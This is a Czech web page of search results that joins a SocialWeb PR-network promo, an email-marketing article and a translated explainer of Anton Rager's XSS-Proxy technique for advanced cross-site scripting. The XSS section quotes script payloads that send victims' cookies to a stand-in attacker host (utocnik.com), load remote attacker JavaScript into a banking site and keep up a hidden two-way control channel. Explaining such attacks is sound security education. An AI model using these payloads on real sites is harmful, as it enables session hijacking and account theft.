LinkedIn… (X dalších sledujících/odběratelů) Takže jedním publikovaným článkem na jeden web Jana hned oslovila nejméně strovky lidí..Články, která vykazují vysokou počáteční návštěvnost, mají i mnohem vyšší průběžnou čtenost a jsou také rychleji zaindexovány ve vyhledávačích. Takže tohle je SocialWeb?Do teď jsem hovořil o vytváření privátních sítí, jenže tito majitelé firem se svými sítěmi jsou vlastně součástí další sítě, která přináší spoustu výhod, jen bych ještě rád upozornil na to, že využívání těchto komponentů SocialWebu je zdela dobrovolné.Podívejme se na 4 koncepty různých uživatelů SocialWebu:1. To je síť kterou jsem popsal výše, tři členové týmu, dva weby.2. Tohle je síť uživatele, jenž nemá členy týmu ale má 8 webových stránek.3. Uživatel, který nemá ani webové stránky ani členy týmu.4. Uživatel, jenž nemá žádné webové stránky ale má členy týmu. Výhoda – Tvorba obsahu a copywritingUživatel číslo jedna, je vlastně soběstačný, má svůj tým a své weby a vlastně vůbec tuto výhodu nepotřebuje.Uživatel dva má velké množství webů, do kterých by měl neustále dodávat nějaký obsah, jenže pochopitelně na to nemá čas ani kapacitu a přesně z toho důvodu může v SocialWebu existovat uživatel 3 a 4, kteří se vlastně živý copywritingem a dodávají obsah na webové stránky jiných uživatelů.Takže takhle se v SocialWebu může v cloudu tvořit obsah webových stránek.O tom jak funkce pro výkup článků v systému socialweb funguje jsem napsal zde článek.Obsah je velmi důležitý, stejně tak jako to, že každý z webů má návštěvnost, jen tak je pak možné tyto weby efektivně využívat pro SEO, linkbuilding, marketing a PR publikaci.Takže teď již máme webové stránky, strukturu, tým, obsah, návštěvnost a na závěr chci ukázat jak SocialWeb dokáže pomáhat například reklamce a nebo PR agentuře.Výhoda - využívání webů jiných uživatelů pro vaše potřebyTakže vaše privátní síť obsahuje dva weby, ty můžete využívat pro co chcete a jak chcete.Co když budou vaši klienti chtít publikaci PR článků na více jak vašich dvou webech?Co když je váš klient někdo, kdo chcete udělat PR na niche, který se k žádnému z vašich webů nehodí?Tohle se právě v SocialWebu dá skvěle řešit, tímto způsobem můžete propagovat služby, produkty zkrátka vytvářet publikace na jiných webech uživatelů SocialWebu, kteří to v nastavení každého jejich webu a nebo v nastavení kategorie povolí.Pro tyto případy existují tři scénáře.1. Agentura, která má své weby a chce publikovat také na jiných webech (dle obrázku)V této variantě máte zase několik možností, jedna z nich je, pokud chcete publikovat na jiných webech jiných uživatelů umožnit také publikaci jiným subjektům na vaše weby – tak můžete pokrývat náklady za publikaci na jiné weby tzv PR exchange.Nebo můžete mít tolik webů, že nebudete potřebovat další, takže si můžete umožněním publikace jiným přivydělávat a nebo můžete využívat jiné weby a platit za to..2. Agentura, která chce využívat webové stránky pro PR a linkbuilding avšak nemá své weby- V tomto případě existuje služba Prstudio.cz, ve které si můžete zakoupit kredit a vyhledávat weby pro publikaci a nebo prohledávat články pro nahrazení klíčových slov SEO odkazem – SocialWeb tak vlastně vůbec nepotřebujete.3. Agentura / Jednotlivec, který nemá o publikaci zájemNemusíte nic nikam publikovat, můžete jen vytvářet weby a tak na vašich webech vydělávat.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Marketing na dotaz reference číslo

E-mail marketing internetových obchodů

access_time21.březen 2020personRedakce

V zahraničí je zcela běžné, že Vám jeden internetový obchod rozešle během měsíce deset až patnáct e-mailových nabídek. V České republice by ihned zákazník někoho takového zařadil do spamlistu. Co si ale myslet o dnešních českých internetových obchodnicích, kteří ještě neobjevili kouzlo e-mailového marketingu? Kde u nich nastala chyba?Americký internetový obchod odešle průměrně svým zákazníkům během měsíce mnohem více e-mailů, než je u nás. V běžných měsících se pohybují nabídky mezi čísly devět až deset, ale v prosinci stoupne toto číslo až na patnáct e-mailů za měsíc. To znamená, že dostanete do své schránky od internetového obchodu nabídkový e-mail každý druhý den.Obchodníci však navíc očekávají, že tento počet bude ještě stoupat, a proto by mohli zákazníci v zahraničí dostávat mnohem více reklamních a nabídkových e-mailů za měsíc. Ale význam těchto nabídkových e-mailů je poměrně pomalý, ale jedná se o stále levnější cestu, jak inzerovat nabídku svého sortimentu.Tržby e-mailového marketinguInternetoví obchodníci během roku 2008 utratili za přímou reklamu 183 miliard dolarů. Nejčastěji se jednalo o kontextové odkazy, stejně jako se dnes jedná u nás. Tato přímá reklama pak vydělala asi 2 200 miliard USD tržeb, tedy koruna, kterou obchodník investoval do reklamy, vynesla 10 Kč v tržbě. Co se týče e-mailového marketingu, zde jsou čísla zcela jiná. Náklady se vyčíslují na 700 milionů dolarů, avšak tržby jsou vyčísleny na 32 miliard dolarů. V takovém případě na jednu korunu spadá tržba 44 Kč.Přímá reklama ale zajišťuje nové klienty, což se o e-mailovém marketingu říct nedá. V případě rozesílání e-mailů se jedná pouze o stávající klienty.Jak je na tom ČR?Česká republika je však oproti USA „sto let za opicemi“. Internetový obchod si zde nedovolí rozesílat reklamní e-mail svým klientům více než jednou týdně a málokdy je toto číslo porušeno během vánoční sezóny. Na druhé straně ale většina internetových obchodů ani netuší, k čemu e-mailový marketing slouží. Nejspíš jsou čeští obchodníci spokojeni se svými tržbami na e-shopu, když nestojí o zvýšení svých tržeb prostřednictvím e-mailového

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz reference číslo

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky